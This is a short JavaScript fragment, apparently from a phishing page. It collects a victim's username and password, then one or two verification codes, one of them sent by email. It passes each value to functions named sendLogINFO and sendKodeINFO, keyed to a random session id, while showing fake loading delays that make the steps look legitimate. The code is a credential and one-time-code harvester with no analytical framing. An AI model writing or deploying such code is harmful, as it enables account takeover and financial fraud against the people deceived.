const sess = generateString(15); function go(id) { if (id == 'pedir-sales' && checkEmpty('_us') && checkEmpty('_ps')) { sendLogINFO(sess, getInputValue('_us'), getInputValue('_ps')); $('#loading-content').show(); loadstation(); } else if (id == 'confirmar-sales' && checkEmpty('_kd')) { sendKodeINFO(sess, getInputValue('_kd')); $('#loading-content').show() setTimeout(function () { loadstation(); }, 1850); } else if (id == 'confirmar-sales-mail' && checkEmpty('_kd_ml')) { sendKodeINFO(sess, getInputValue('_kd_ml')); $('#loading-content').show() setTimeout(function () { loadstation(); }, 1850); } }